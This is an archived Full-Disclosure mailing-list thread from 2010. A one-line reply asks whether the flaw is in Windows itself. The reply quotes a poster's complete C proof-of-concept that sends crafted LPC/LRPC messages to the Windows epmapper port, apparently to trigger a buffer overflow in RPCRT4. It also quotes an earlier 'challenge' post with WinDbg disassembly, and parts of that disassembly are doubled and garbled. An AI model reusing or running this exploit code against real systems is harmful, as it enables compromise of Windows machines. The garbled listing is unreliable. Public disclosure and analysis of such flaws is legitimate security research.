| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 8 Oct 2010 07:03:40 -0500
From: Richard Miles <richard.k.miles@...glemail.com>
To: yuange <yuange1975@...mail.com>
Cc: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: Re: LPC 0day
Hi yuange
Is it a flaw at Windows itself or a third party product?
Thanks
2010/10/7 yuange <yuange1975@...mail.com>
>
>
> #include <windows.h>
> #include <stdio.h>
> //#include "ntdll.h"
> //#pragma comment(lib,"ntdll.lib")
> #pragma comment(lib,"advapi32.lib")
>
> typedef enum _PROCESSINFOCLASS {
> ProcessDebugPort=7// 7 Y Y
> } PROCESSINFOCLASS;
> typedef struct _UNICODE_STRING {
> USHORT Length;
> USHORT MaximumLength;
> PWSTR Buffer;
> } UNICODE_STRING ,*PUNICODE_STRING;
> typedef struct _CLIENT_ID
> {
> HANDLE UniqueProcess;
> HANDLE UniqueThread;
> }CLIENT_ID,* PCLIENT_ID, **PPCLIENT_ID;
> #define PORT_NAME_LEN 64
> #define LRPC_CONNECT_REQUEST 0
> #define LPC_CONNECTION_REQUEST 10
> #define offset 0x100+0x4-0x6*4
> #define MAXLEN 0x148
> #define BACKNAME L"\\RPC Control\\back2"
> #define RPCLPCNAME L"\\RPC Control\\epmapper"
> #define BINDNAME L"back2"
> typedef struct _LRPC_BIND_EXCHANGE
> {
> INT ConnectType ;
> DWORD AssocKey ;
> char szPortName[PORT_NAME_LEN] ;
> RPC_SYNTAX_IDENTIFIER InterfaceId;
> RPC_SYNTAX_IDENTIFIER TransferSyntax;
> RPC_STATUS RpcStatus;
> unsigned char fBindBack ;
> unsigned char fNewSecurityContext ;
> unsigned char fNewPresentationContext;
> unsigned char PresentationContext;
> unsigned char Pad[3];
> unsigned long SecurityContextId;
> } LRPC_BIND_EXCHANGE;
> typedef struct _LPC_MESSAGE
> {
> USHORT DataSize;
> USHORT MessageSize;
> USHORT MessageType;
> USHORT DataInfoOffset;
> CLIENT_ID ClientId;
> ULONG MessageId;
> ULONG SectionSize;
> // UCHAR & nbsp; Data[];
> }LPC_MESSAGE, *PLPC_MESSAGE;
>
> typedef struct _OBJECT_ATTRIBUTES
> {
> DWORD Length;
> HANDLE RootDirectory;
> PUNICODE_STRING ObjectName;
> DWORD Attributes;
> PVOID SecurityDescriptor;
> PVOID SecurityQualityOfService;
> }OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES, **PPOBJECT_ATTRIBUTES;
>
> typedef
> DWORD
> (CALLBACK * NTCREATEPORT)(
> OUT PHANDLE PortHandle,
> IN POBJECT_ATTRIBUTES ObjectAttributes,
> IN ULONG MaxConnectInfoLength,
> IN ULONG MaxDataLength,
> IN OUT PULONG Reserved OPTIONAL );
> typedef
> DWORD
> (CALLBACK * NTREPLYWAITRECVIVEPORT)(
> IN HANDLE PortHandle,
> OUT PHANDLE ReceivePortHandle OPTIONAL,
> IN PLPC_MESSAGE Reply OPTIONAL,
> OUT PLPC_MESSAGE IncomingRequest );
>
> typedef
> DWORD
> (CALLBACK * NTACCEPTCONNECTPORT) (
> OUT PHANDLE PortHandle,
> IN PVOID PortContext OPTIONAL,
> IN PLPC_MESSAGE ConnectionRequest,
> IN BOOLEAN AcceptConnection,
> IN OUT int int1, // IN OUT PPORT_VIEW ServerView OPTIONAL,
> OUT int int2 //OUT PREMOTE_PORT_VIEW ClientView OPTIONAL
> );
> typedef
> DWORD
> (CALLBACK * NTCONNECTPORT)(
> OUT PHANDLE PortHandle,
> IN PUNICODE_STRING PortName,
> IN PSECURITY_QUALITY_OF_SERVICE SecurityQos,
> IN OUT int int1,
> // IN OUT PPORT_VIEW ClientView OPTIONAL,
> IN OUT int int2,
> // IN OUT PREMOTE_PORT_VIEW ServerView OPTIONAL,
> OUT PULONG MaxMessageLength OPTIONAL,
> IN OUT PVOID ConnectionInformation OPTIONAL,
> IN OUT PULONG ConnectionInformationLength OPTIONAL
> );
> typedef
> DWORD
> (CALLBACK *NTREQUESTWAITREPLYPORT)( // NtRequestWaitReplyPort(
> IN HANDLE PortHandle,
> IN PLPC_MESSAGE Request,
> OUT PLPC_MESSAGE IncomingReply );
> typedef
> DWORD
> (CALLBACK *NTCOMPLETECONNECTPORT) (
> IN HANDLE PortHandle
> );
> typedef
> DWORD
> (CALLBACK *RTLINITUNICODESTRING)(
> PUNICODE_STRING DestinationString,
> PCWSTR SourceString
> );
> typedef
> DWORD
> (CALLBACK * NTREPLYPORT)(
> IN HANDLE PortHandle,
> IN PLPC_MESSAGE Reply );
> typedef
> DWORD
> (CALLBACK * NTSETINFORMATIONPROCESS)(
> IN HANDLE ProcessHandle,
> IN PROCESSINFOCLASS ProcessInformationClass,
> IN PVOID ProcessInformation,
> IN ULONG ProcessInformationLength );
>
> typedef struct _DEBUG_MESSAGE
> {
> LPC_MESSAGE PORT_MSG;
> DEBUG_EVENT DebugEvent;
> }DEBUG_MESSAGE, *PDEBUG_MESSAGE;
>
> NTSETINFORMATIONPROCESS NtSetInformationProcess;
> NTREPLYWAITRECVIVEPORT NtReplyWaitReceivePort;
> NTCREATEPORT NtCreatePort;
> NTREPLYPORT NtReplyPort;
> NTCONNECTPORT NtConnectPort;
> RTLINITUNICODESTRING RtlInitUnicodeString;
> NTREQUESTWAITREPLYPORT NtRequestWaitReplyPort;
> NTACCEPTCONNECTPORT NtAcceptConnectPort;
> NTCOMPLETECONNECTPORT NtCompleteConnectPort;
>
> template <int i> struct PORT_MESSAGEX : LPC_MESSAGE {
> UCHAR Data[i];
> };
> PROCESS_INFORMATION pi;
> int server();
> void initapi();
> int main()
> {
> // LPC_MESSAGE Reply;
> // HMODULE hNtdll;
> // DWORD dwAddrList[9];
> BOOL bExit = FALSE;
> // DWORD dwRet;
> // HANDLE hPort;
> int k=0;
> unsigned long i;
> // DEBUG_MESSAGE dm;
> OBJECT_ATTRIBUTES oa = {sizeof(oa)};
> PORT_MESSAGEX<0x130> PortReply,PortRecv;
> STARTUPINFO si={sizeof(si)};
> // NTSTATUS
> int Status;
>
> PLPC_MESSAGE Request;
> // PLPC_MESSAGE IncomingReply;
> LPC_MESSAGE Message;
> HANDLE LsaCommandPortHandle;
> UNICODE_STRING LsaCommandPortName;
> SECURITY_QUALITY_OF_SERVICE DynamicQos;
> LRPC_BIND_EXCHANGE BindExchange;
> DWORD Key=0x11223344;
> unsigned long BindExchangeLength = sizeof(LRPC_BIND_EXCHANGE);
> BindExchange.ConnectType = LRPC_CONNECT_REQUEST ;
> BindExchange.AssocKey = Key;
> // wcscpy((wchar_t *)&(BindExchange.szPortName),BINDNAME);
> DynamicQos.ImpersonationLevel =SecurityAnonymous; //
> SecurityImpersonation;
> DynamicQos.ContextTrackingMode = SECURITY_STATIC_TRACKING;
> //SECURITY_DYNAMIC_TRACKING;
> DynamicQos.EffectiveOnly = TRUE;
> initapi();
> printf( "\r\nwindows lpc test!\r\n");
>
> CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)server,0,0,&i);
>
>
> //
> // Connect to the Reference Monitor Command Port. This port
> // is used to send commands from the LSA to the Reference Monitor.
> //
> RtlInitUnicodeString( &LsaCommandPortName,RPCLPCNAME);
> Status = NtConnectPort(
> &LsaCommandPortHandle,
> &LsaCommandPortName,
> &DynamicQos,
> NULL,
> NULL,
> NULL, // &maxlen,
> &BindExchange,
> &Bi ndExchangeLength);
> if ((Status)) {
>
> exit(Status);
> //print(("LsapRmInitializeServer - Connect to Rm Command Port
> failed 0x%lx\n",Status));
> // goto InitServerError;
> }
>
> // exit(0);
> /*
> //create port
> dwRet = NtCreatePort(&hPort, &oa, 0, 0x148, 0);
> if(dwRet != 0)
> {
> printf("create hPort failed. ret=%.8X\n", dwRet);
> return 0;
> }
> //create process
> if(!CreateProcess(0, "debugme.exe", NULL, NULL, TRUE,
> CREATE_SUSPENDED, 0, 0, &si, &pi))
> {
> printf("CreateProcess failed:%d\n", GetLastError());
> return 0;
> }
> //set debug port
> dwRet = NtSetInformationProcess(pi.hProcess, ProcessDebugPort,
> &hPort, sizeof(hPo rt));
> if(dwRet != 0)
> {
> printf("set debug port error:%.8X\n", dwRet);
> return 0;
> }
> //printf("pid:0x%.8X %d hPort=0x%.8X\n", pi.dwProcessId,
> pi.dwProcessId, hPort);
> ResumeThread(pi.hThread);
> */
> while (true)
> {
> memset(&Message, 0, sizeof(Message));
>
> Message.MessageSize=0x118;
> Message.DataSize=0x100;
> Message.MessageId=0x1122;
> Request=&Message;
>
>
>
> memset(&PortReply, 0, sizeof(PortReply));
> // memcpy(&PortReply, &dm, sizeof(dm));
>
> memset(&PortReply, 0, sizeof(PortReply));
> // memcpy(&PortReply, &dm, sizeof(dm));
> PortReply.MessageSize = 0x100;
> PortReply.DataSize = 0x100-0x18;
> PortReply.MessageType=0;
> PortReply.MessageId=0x1122;
> PortReply.Data[0]=0x0b;
> PortReply.Data[1]=0;
> PortReply.Data[2]=0;
> PortReply.Data[3]=0;
> PortReply.Data[4]=0;
> wcscpy((wchar_t *)&(PortReply.Data[0x10]),BINDNAME);
> Sleep(1000);
>
> Status=NtRequestWaitReplyPort(LsaCommandPortHandle,&PortReply,&PortRecv);
> //Reply);
>
>
> // memcpy(&PortReply.Data[offset-4], &dwAddrList,
> sizeof(dwAddrList));
>
> PortReply.MessageSize = 0xa0;
> PortReply.DataSize = 0xa0-0x18;
> PortReply.MessageType=0;
> PortReply.MessageId=0x1122;
> PortReply.Data[0]=0x0;
> PortReply.Data[1]=0;
> PortReply.Data[2]=0;
> PortReply.Data[3]=0;
> PortReply.Data[4]=0;
> memcpy((unsigned char *)&(PortReply.Data[0x0c]),
>
> "\x80\xbd\xa8\xaf\x8a\x7d\xc9\x11\xbe\xf4\x08\x00\x2b\x10\x29\x89\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00",0x20);
>
>
> //"\xe6\x73\x0c\xe6\xf9\x88\xcf\x11\x9a\xf1\x00\x20\xaf\x6e\x72\xf4\x02\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00",0x20);
>
> // memcpy(&PortReply.Data[offset-4], &dwAddrList,
> sizeof(dwAddrList));
>
> _asm{
> // die: jmp die
> }
> Sleep(1000);
>
> Status=NtRequestWaitReplyPort(LsaCommandPortHandle,&PortReply,&PortRecv);
> //Reply);
> BindExchange=*(LRPC_BIND_EXCHANGE *)&(PortRecv.Data[8]);
>
> if (!(Status))
> {
> while(1){
> PortReply.MessageSize = 0x100;
> PortReply.DataSize = 0x100-0x18;
> PortReply.MessageType=0;
> PortReply.MessageId=PortRecv.MessageId;
> PortReply.Data[0]=0x01;
> PortReply.Data[1]=0;
> PortReply.Data[2]=0;
> PortReply.Data[3]=0;
> PortReply.Data[4]=0x3;
> PortReply.Data[5]=0;
> PortReply.Data[6]=0;
>
>
> *(int *)(&(PortReply.Data[0x18]))=*(int
> *)(&(PortRecv.Data[0x30]));
>
> _asm{
> // die: jmp die
> }
> Sleep(100);
>
> Status=NtRequestWaitReplyPort(LsaCommandPortHandle,&PortReply,&PortRecv);
> //Reply);
>
>
> Sleep(0x7fffffff);
> }
> }
> }
>
>
> return 0;
> }
>
> int server()
> {
> BOOL bExit = FALSE;
> DWORD dwRet;
> // HANDLE hPort;
> int k=0;
> unsigned long maxlen;
> // DEBUG_MESSAGE dm;
> OBJECT_ATTRIBUTES oa = {sizeof(oa)};
> PORT_MESSAGEX<0x130> PortReply,PortRecv;
> STARTUPINFO si={sizeof(si)};
> // NTSTATUS
> int Status;
>
> PLPC_MESSAGE Request;
> PLPC_MESSAGE IncomingReply;
> LPC_MESSAGE Message;
> HANDLE BackPortHandle,NewHandle,NewAccHandle;
> UNICODE_STRING BackPortName;
> SECURITY_QUALITY_OF_SERVICE DynamicQos;
> LRPC_BIND_EXCHANGE BindExchange;
> DWORD Key=0x11223344;
> unsigned long BindExchangeLength = sizeof(LRPC_BIND_EXCHANGE);
> BindExchange.ConnectType = LRPC_CONNECT_REQUEST ;
> BindExchange.AssocKey = Key;
>
> DynamicQos.ImpersonationLevel =SecurityAnonymous; //
> SecurityImpersonation;
> DynamicQos.ContextTrackingMode = SECURITY_STATIC_TRACKING;
> //SECURITY_DYNAMIC_TRACKING;
> DynamicQos.EffectiveOnly = TRUE;
>
>
>
>
> RtlInitUnicodeString( &BackPortName,BACKNAME);
> memset(&oa,0,sizeof(oa));
> oa.Length=0x18;
> oa.ObjectName=&BackPortName;
> oa.Attributes=0x40;
>
> //InitializeObjectAttributes(&oa,&BackPortName,0x40,0,0);
> //OBJ_CASE_INSENSITIVE,0,0); //SecurityDescriptor);
>
> //create port
> dwRet = NtCreatePort(&BackPortHandle, &oa,
> sizeof(LRPC_BIND_EXCHANGE),MAXLEN, 0);
> if(dwRet != 0)
> {
> printf("create hPort failed. ret=%.8X\n", dwRet);
> // return 0;
> }
>
> while (true)
> {
> memset(&Message, 0, sizeof(Message));
>
> Message.MessageSize=0x118;
> Message.DataSize=0x100;
> Message.MessageId=0x11;
> Request=&Message;
> memset(&PortReply, 0, sizeof(PortReply));
> // memcpy(&PortReply, &dm, sizeof(dm));
> PortReply.MessageSize = 0x148;
> PortReply.DataSize = 0x130;
> PortReply.MessageType=0;
> PortReply.Data[0]=0x0b;
> PortReply.Data[1]=0;
> PortReply.Data[2]=0;
> PortReply.Data[3]=0;
> PortReply.Data[4]=0;
>
> // memcpy(&PortReply.Data[offset-4], &dwAddrList,
> sizeof(dwAddrList));
>
> Status=NtReplyWaitReceivePort(BackPortHandle,0,0,&PortRecv);
> //Reply);
> if(PortRecv.MessageType==LPC_CONNECTION_REQUEST)
> {
> Status=NtAcceptConnectPort(&NewAccHandle, 0, &PortRecv,1, NULL, NULL);
> Status=NtCompleteConnectPort (NewAccHandle);
>
> memset(&PortRecv, 0, sizeof(PortRecv));
>
> Status=NtReplyWaitReceivePort(NewAccHandle,0,0,&PortRecv);
> //&PortReply,&PortRecv);
>
> while(1)
> {
> PortRecv.MessageSize = 0x148;
> PortRecv.DataSize = 0x130;
>
> // PortReply.MessageId=PortRecv.MessageId;
> _asm{
> //die: jmp die
> }
> Status=NtReplyWaitReceivePort(NewAccHandle,0,&PortRecv,&PortRecv);
> //&PortReply,&PortRecv);
> Sleep(100);
> Status=NtReplyWaitReceivePort(NewAccHandle,0,0,&PortRecv);
> //&PortReply,&PortRecv);
> }
> }
> }
> }
>
> void initapi()
> {
> HMODULE hNtdll;
>
> //get native api address
> hNtdll = LoadLibrary("ntdll.dll");
> if(hNtdll == NULL)
> {
> printf("LoadLibrary failed:%d\n", GetLastError());
> }
> NtReplyWaitReceivePort = (NTREPLYWAITRECVIVEPORT)
> GetProcAddress(hNtdll, "NtReplyWaitReceivePort");
> NtCreatePort = (NTCREATEPORT)
> GetProcAddress(hNtdll, "NtCreatePort");
> NtReplyPort = (NTREPLYPORT)
> GetProcAddress(hNtdll, "NtReplyPort");
> NtSetInformationProcess = (NTSETINFORMATIONPROCESS)
> GetProcAddress(hNtdll, "NtSetInformationProcess");
> NtRequestWaitReplyPort= (NTREQUESTWAITREPLYPORT)
> GetProcAddress(hNtdll,"NtRequestWaitReplyPort");
>
> NtConnectPort = (NTCONNECTPORT)
> GetProcAddress(hNtdll, "NtConnectPort");
> NtCompleteConnectPort = (NTCOMPLETECONNECTPORT)
> GetProcAddress(hNtdll, "NtCompleteConnectPort");
> NtAcceptConnectPort = (NTACCEPTCONNECTPORT)
> GetProcAddress(hNtdll, "NtAcceptConnectPort");
> RtlInitUnicodeString=(RTLINITUNICODESTRING)
> GetProcAddress(hNtdll,"RtlInitUnicodeString");
>
> }
>
>
>
> ------------------------------
> From: yuange1975@...mail.com
> To: full-disclosure@...ts.grok.org.uk
> Subject: 0day analysis of the challenges
> Date: Tue, 7 Sep 2010 12:38:27 +0000
>
>
> 0day analysis of the challenges
> 2010-08-05 20:32 2010-08-05 20:32
>
>
>
> The following code has a buffer overflow, please write POC code analysis.
> Code please send to yuange1975@....com .
> **
>
>
> 0:014> u RPCRT4!LRPC_SCALL::SendRequest 0:014> u RPCRT4! LRPC_SCALL::
> SendRequest
> RPCRT4!LRPC_SCALL::SendRequest: RPCRT4! LRPC_SCALL:: SendRequest:
> 77c4d4e6 8bff mov edi,edi 77c4d4e6 8bff mov edi, edi
> 77c4d4e8 55 push ebp 77c4d4e8 55 push ebp
> 77c4d4e9 8bec mov ebp,esp 77c4d4e9 8bec mov ebp, esp
> 77c4d4eb 81ec10010000 sub esp,110h 77c4d4eb 81ec10010000 sub esp,
> 110h
> 77c4d4f1 a16c86cb77 mov eax,dword ptr [RPCRT4!__security_cookie
> (77cb86 77c4d4f1 a16c86cb77 mov eax, dword ptr [RPCRT4! __security_cookie
> (77cb86
> 6c)] 6c)]
> 77c4d4f6 53 push ebx 77c4d4f6 53 push ebx
> 77c4d4f7 56 push esi 77c4d4f7 56 push esi
> 77c4d4f8 8945fc mov dword ptr [ebp-4],eax 77c4d4f8 8945fc mov
> dword ptr [ebp-4], eax
> 0:014> u 0:014> u
> RPCRT4!LRPC_SCALL::SendRequest+0x15: RPCRT4! LRPC_SCALL:: SendRequest +0
> x15:
> 77c4d4fb 8b450c mov eax,dword ptr [ebp+0Ch] 77c4d4fb 8b450c
> mov eax, dword ptr [ebp +0 Ch]
> 77c4d4fe 8bf1 mov esi,ecx 77c4d4fe 8bf1 mov esi, ecx
> 77c4d500 33c9 xor ecx,ecx 77c4d500 33c9 xor ecx, ecx
> 77c4d502 57 push edi 77c4d502 57 push edi
> 77c4d503 8b7d08 mov edi,dword ptr [ebp+8] 77c4d503 8b7d08 mov
> edi, dword ptr [ebp +8]
> 77c4d506 bb00200000 mov ebx,2000h 77c4d506 bb00200000 mov ebx,
> 2000h
> 77c4d50b 8908 mov dword ptr [eax],ecx 77c4d50b 8908 mov
> dword ptr [eax], ecx
> 77c4d50d 855f28 test dword ptr [edi+28h],ebx 7 7c4d50d 855f28
> test dword ptr [edi +28 h], ebx
> 0:014> u 0:014> u
> RPCRT4!LRPC_SCALL::SendRequest+0x2a: RPCRT4! LRPC_SCALL:: SendRequest +0
> x2a:
> 77c4d510 8985f0feffff mov dword ptr [ebp-110h],eax 77c4d510
> 8985f0feffff mov dword ptr [ebp-110h], eax
> 77c4d516 898df8feffff mov dword ptr [ebp-108h],ecx 77c4d516
> 898df8feffff mov dword ptr [ebp-108h], ecx
> 77c4d51c 0f85422f0100 jne RPCRT4!LR PC_SCALL::SendRequest+0x38
> (77c60464) 77c4d51c 0f85422f0100 jne RPCRT4! LRPC_SCALL:: SendRequest +0
> x38 (77c60464)
> 77c4d522 8d86d8000000 lea eax,[esi+0D8h] 77c4d522 8d86d8000000 lea
> eax, [esi +0 D8h]
> 77c4d528 3908 cmp dword ptr [eax],ecx 77c4d528 3908 cmp
> dword ptr [eax], ecx
> 77c4d52a 740e je RPCRT4!LRPC_SCALL::SendRequest+0xaf
> (77c4d53a) 77c4d52a 740e je RPCRT4! LRPC_SCALL:: SendRequest +0 xaf
> (77c4d53a)
> 77c4d52c 398ef8000000 cmp dword ptr [esi+0F8h],ecx 77c4d52c
> 398ef8000000 cmp dword ptr [esi +0 F8h], ecx
> 77c4d532 8908 mov dword ptr [eax],ecx 77c4d532 8908 mov
> dword ptr [eax], ecx
> 0:014> u 0:014> u
> RPCRT4!LRPC_SCALL::SendRequest+0x75: RPCRT4! LRPC_SCALL:: SendRequest +0
> x75:
> 77c4d534 0f845a2f0100 je RPCRT4!LRPC_SCALL::SendRequest+0x77
> (77c60494) 77c4d534 0f845a2f0100 je RPCRT 4! LRPC_SCALL:: SendRequest +0
> x77 (77c60494)
> 77c4d53a 8b86a4000000 mov eax,dword ptr [esi+0A4h] 77c4d53a
> 8b86a4000000 mov eax, dword ptr [esi +0 A4h]
> 77c4d540 f6401c04 test byte ptr [eax+1Ch],4 77c4d540 f6401c04
> test byte ptr [eax +1 Ch], 4
> 77c4d544 0f84700f0000 je RPCRT4!LRPC_SCALL::SendRequest+0x1d8
> (77c4e4ba) 77c4d544 0f84700f0000 je RPCRT4! LRPC_SCALL:: SendRequest +0
> x1d8 (77c4e4ba)
> 77c4d54a 668b08 mov cx,word ptr [eax] 77c4d54a 668b08 mov cx,
> word ptr [eax]
> 77c4d54d 6683c118 add cx,18h 77c4d54d 6683c118 add cx, 18h
> 77c4d551 66894802 mov word ptr [eax+2],cx 77c4d551 66894802 mov
> word ptr [eax +2], cx
> 77c4d555 8b86a4000000 mov eax,dword ptr [esi+0A4h] 77c4d555
> 8b86a4000000 mov eax, dword ptr [esi +0 A4h]
> 0:014> u 0:014> u
> RPCRT4!LRPC_SCALL::SendRequest+0xd0: RPCRT4! LRPC_SCALL:: SendRequest +0
> xd0:
> 77c4d55b f6401d08 test byte ptr [eax+1Dh],8 77c4d55b f6401d08
> test byte ptr [eax +1 Dh], 8
> 77c4d55f 0f856c2f0100 jne RPCRT4!LRPC_SCALL::SendRequest+0xd6
> (77c604d1) 77c4d55f 0f856c2f0100 jne RPCRT4! LRPC_SCALL:: SendRequest +0
> xd6 (77c604d1)
> 77c4d565 c6401802 mov byte ptr [eax+18h],2 77c4d565 c6401802
> mov byte ptr [eax +18 h], 2
> 77c4d 569 8b86a4000000 mov eax,dword ptr [esi+0A4h] 77c4d569
> 8b86a4000000 mov eax, dword ptr [esi +0 A4h]
> 77c4d56f 8b4f0c mov ecx,dword ptr [edi+0Ch] 77c4d56f 8b4f0c
> mov ecx, dword ptr [edi +0 Ch]
> 77c4d572 894840 mov dword ptr [eax+40h],ecx 77c4d572 894840
> mov dword ptr [eax +40 h], ecx
> 77c4d575 8b86a4000000 mov eax,dword ptr [esi+0A4h] 77c4d575
> 8b86a4000000 mov eax, dword ptr [esi +0 A4h]
> 77c4d57b 8b8eb0000000 mov ecx,dword ptr [esi+0B0h] 77c4d57b
> 8b8eb0000000 mov ecx, dword ptr [esi +0 B0h]
> 0:014> u 0:014> u
> RPCRT4!LRPC_SCALL::SendRequest+0xf8: RPCRT4! LRPC_SCALL:: SendRequest +0
> xf8:
> 77c4d581 894834 mov dword ptr [eax+34h],ecx 77c4d581 894834
> mov dword ptr [eax +34 h], ecx
> 77c4d584 8b86a4000000 mov eax,dword ptr [esi+0A4h] 77c4d584
> 8b86a4000000 mov eax, dword ptr [esi +0 A4h]
> 77c4d58a c6401900 mov byte ptr [eax+19h],0 77c4d58a c6401900
> mov byte ptr [eax +19 h], 0
> 77c4d58e 8b86a4000000 mov eax,dword ptr [esi+0A4h] 77c4d58e
> 8b86a4000000 mov eax, dword ptr [esi +0 A4h]
> 77c4d594 80480540 or byte ptr [eax+5],40h 77c4d594 80480540 or
> byte ptr [eax +5], 40h
> 77c4d598 8d85fcfeffff lea eax,[ebp-104h] 77c4d598 8d85fcfeffff lea
> eax, [ebp-104h]
> 77c4d59e 50 push eax 77c4d59e 50 push eax
> 77c4d59f ffb6a4000000 push dword ptr [esi+0A4h] 77c4d59f
> ffb6a4000000 push dword ptr [esi +0 A4h]
> 0:014> u 0:014> u
> RPCRT4!LRPC_SCALL::SendRequest+0x11c: RPCRT4! LRPC_SCALL:: SendRequest +0
> x11c:
> 77c4d5a5 8b869c000000 mov eax,dword ptr [esi+9Ch] 77c4d5a5
> 8b869c000000 mov eax, dword ptr [esi +9 Ch]
> 77c4d5ab ff7024 push dword ptr [eax+24h] 77c4d5ab ff7024 push
> dword ptr [eax +24 h]
> 77c4d5ae ff15b410c277 call dword ptr
> [RPCRT4!_imp__NtRequestWaitReplyPort 77c4d5ae ff15b410c277 call dword ptr
> [RPCRT4! _imp__NtRequestWaitReplyPort
> (77c210b4)] (77c210b4)]
> 77c4d5b4 8bc8 mov ecx,eax 77c4d5b4 8bc8 mov ecx, eax
> 77c4d5b6 b8000000c0 &n bsp; mov eax,0C0000000h 77c4d5b6 b8000000c0
> mov eax, 0C0000000h
> 77c4d5bb 23c8 and ecx,eax 77c4d5bb 23c8 and ecx, eax
> 77c4d5bd 3bc8 cmp ecx,eax 77c4d5bd 3bc8 cmp ecx, eax
> 77c4d5bf 0f84152f0100 je RPCRT4!LRPC_SCALL::SendRequest+0x138
> (77c604da) 77c4d5bf 0f84152f0100 je RPCRT4! LRPC_SCALL:: SendRequest +0
> x138 (77c604da)
> 0:014> u 0:014> u
> RPCRT4!LRPC_SCALL::SendRequest+0x16d: RPCRT4! LRPC_SCALL:: SendRequest +0
> x16d:
> 77c4d5c5 855f28 test dword ptr [edi+28h],ebx 77c4d5c5 855f28
> test dword ptr [edi +28 h], ebx
> 77c4d5c8 751f jne RPCRT4!LRPC_SCALL::SendRequest+0x191
> (77c4d5e9) 77c4d5c8 751f jne RPCRT4! LRPC_SCALL:: SendRequest +0 x191
> (77c4d5e9)
> 77c4d5ca 8b86a4000000 mov eax,dword ptr [esi+0A4h] 77c4d5ca
> 8b86a4000000 mov eax, dword ptr [esi +0 A4h]
> 77c4d5d0 8a4018 mov al,byte ptr [eax+18h] 77c4d5d0 8a4018 mov
> al, byte ptr [eax +18 h]
> 77c4d5d3 3c10 cmp al,10h 77c4d5d3 3c10 cmp al, 10h
> 77c4d5d5 7412 je RPCRT4!LRPC_SCALL::SendRequest+0x191
> (77c4d5e9) 77c4d5d5 7412 je RPCRT4! LRPC_SCALL:: SendRequest +0 x191
> (77c4d5e9)
> 77c4d5d7 3c04 &nbs p; cmp al,4 77c4d5d7 3c04 cmp al, 4
> 77c4d5d9 740e je RPCRT4!LRPC_SCALL::SendRequest+0x191
> (77c4d5e9) 77c4d5d9 740e je RPCRT4! LRPC_SCALL:: SendRequest +0 x191
> (77c4d5e9)
> 0:014> u 0:014> u
> RPCRT4!LRPC_SCALL::SendRequest+0x183: RPCRT4! LRPC_SCALL:: SendRequest +0
> x183:
> 77c4d5db 8b4708 mov eax,dword ptr [edi+8] 77c4d5db 8b4708 mov
> eax, dword ptr [edi +8]
> 77c4d5de 85c0 test eax,eax 77c4d5de 85c0 test eax, eax
> 77c4d5e0 7407 je RPCRT4!LRPC_SCALL::SendRequest+0x191
> (77c4d5e9) 77c4d5e0 7407 je RPCRT4! LRPC_SCALL:: SendRequest +0 x191
> (77c4d5e9)
> 77c4d5e2 50 push eax 77c4d5e2 50 push eax
> 77c4d5e3 e80da40000 call RPCRT4!operator delete (77c579f5) 7
> 7c4d5e3 e80da40000 call RPCRT4! Operator delete (77c579f5)
> 77c4d5e8 59 pop ecx 77c4d5e8 59 pop ecx
> 77c4d5e9 80bd14ffffff06 cmp byte ptr [ebp-0ECh],6 77c4d5e9
> 80bd14ffffff06 cmp byte ptr [ebp-0ECh], 6
> 77c4d5f0 0f85f60e0000 jne RPCRT4!LRPC_SCALL::SendRequest+0x1d0
> (77c4e4ec) 77c4d5f0 0f85f60e0000 jne RPCRT4! LRPC_SCALL:: SendRequest +0
> x1d0 (77c4e4ec)
> 0:014> u 0:014> u
> RPCRT4!LRPC_SCALL::SendRequest+0x19a: RPCRT4! LRPC_SCALL:: SendRequest +0
> x19a:
> 77c4d5f6 0fbf8516ffffff movsx eax,word ptr [ebp-0EAh] 77c4d5f6
> 0fbf8516ffffff movsx eax, word ptr [ebp-0EAh]
> 77c4d5fd 8b8df0feffff mov ecx,dword ptr [ebp-110h] 77c4d5fd
> 8b8df0feffff mov ecx, dword ptr [ebp-110h]
> 77c4d603 8901 mov dword ptr [ecx],eax 77c4d603 8901 mov
> dword ptr [ecx], eax
> 77c4d605 8bb5f8feffff mov &nb sp; esi,dword ptr [ebp-108h] 77c4d605
> 8bb5f8feffff mov esi, dword ptr [ebp-108h]
> 77c4d60b 85f6 test esi,esi 77c4d60b 85f6 test esi, esi
> 77c4d60d 0f85ed2e0100 jne RPCRT4!LRPC_SCALL::SendRequest+0x1b3
> (77c60500) 77c4d60d 0f85ed2e0100 jne RPCRT4! LRPC_SCALL:: SendRequest +0
> x1b3 (77c60500)
> 77c4d613 33c0 xor eax,eax 77c4d613 33c0 xor eax, eax
> 77c4d615 8b4dfc &nb sp; mov ecx,dword ptr [ebp-4] 77c4d615
> 8b4dfc mov ecx, dword ptr [ebp-4]
> 0:014> u 0:014> u
> RPCRT4!LRPC_SCALL::SendRequest+0x214: RPCRT4! LRPC_SCALL:: SendRequest +0
> x214:
> 77c4d618 5f pop edi 77c4d618 5f pop edi
> 77c4d619 5e pop esi 77c4d619 5e pop esi
> 77c4d6 1a 5b pop ebx 77c4d61a 5b pop ebx
> 77c4d61b e810110000 call RPCRT4!__security_check_cookie (77c4e730)77c4d61b e810110000 call RPCRT4! __security_check_cookie (77c4e730)
> 77c4d620 c9 leave 77c4d620 c9 leave
> 77c4d621 c20800 ret 8 77c4d621 c20800 ret 8
> 77c4d624 90 &nb sp; nop 77c4d624 90 nop
> 77c4d625 90 nop 77c4d625 90 nop
>
>
>
>
> http://hi.baidu.com/yuange1975/blog/item/022dec5901af02272834f0fc.html
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists